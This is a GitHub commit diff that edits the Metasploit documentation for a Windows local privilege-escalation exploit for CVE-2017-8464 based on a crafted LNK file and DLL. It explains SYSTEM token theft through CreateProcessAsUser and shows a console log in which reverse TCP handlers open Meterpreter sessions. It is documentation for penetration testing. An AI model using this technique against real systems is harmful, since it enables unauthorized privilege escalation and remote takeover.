Skip to content

Commit fa8d017

Browse files
committed
Change documentation from a first person context
1 parent 11093b8 commit fa8d017

File tree

1 file changed

+4
-4
lines changed

1 file changed

+4
-4
lines changed

documentation/modules/exploit/windows/local/cve_2017_8464_lnk_lpe.md

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
## Description
2-
This PR adds a new Windows local exploit version of the existing file
2+
This module is a Windows local exploit version of the existing file
33
format module for CVE-2017-8464. The module works by dropping the
44
specially crafted LNK file and DLL to disk, which causes
55
`SearchProtocolHost.exe` to parse the LNK file and thus load the DLL via
@@ -9,7 +9,7 @@ this can be used to elevate privileges.
99
The original DLL template needed some significant reworking to make it
1010
compatible for execution within `SearchProtocolHost.exe`. The payload
1111
was originally failing in the hollowed child `rundll32.exe` process with
12-
a denied error from winsock. I addressed this by checking if the process
12+
a denied error from winsock. This was addressed by checking if the process
1313
which loaded the crafted DLL is `SearchProtocolHost.exe` and when it is,
1414
it opens the token of another SYSTEM process and passes it to
1515
`CreateProcessAsUser` for the payload to work. When the DLL is loaded
@@ -69,7 +69,7 @@ Exploit target:
6969
[*] > Ruby Code (13 bytes)
7070
> run -z
7171
[*] Exploit running as background job 0.
72-
[*] Started reverse TCP handler on 192.168.135.112:30001
72+
[*] Started reverse TCP handler on 192.168.135.112:30001
7373
[*] Sending stage (205379 bytes) to 192.168.134.133
7474
[*] Meterpreter session 1 opened (192.168.135.112:30001 -> 192.168.134.133:49178) at 2017-11-06 10:22:02 -0800
7575
> sysinfo
@@ -132,7 +132,7 @@ Exploit target:
132132
133133
> run -j
134134
[*] Exploit running as background job 1.
135-
[*] Started reverse TCP handler on 192.168.135.112:30002
135+
[*] Started reverse TCP handler on 192.168.135.112:30002
136136
[*] Generating LNK file to load: C:\Users\msfuser\QtGyQHZpWvmzjdsn.dll
137137
[*] Sending stage (205379 bytes) to 192.168.134.133
138138
[*] Meterpreter session 2 opened (192.168.135.112:30002 -> 192.168.134.133:49179) at 2017-11-06 10:23:03 -0800

0 commit comments

Comments
 (0)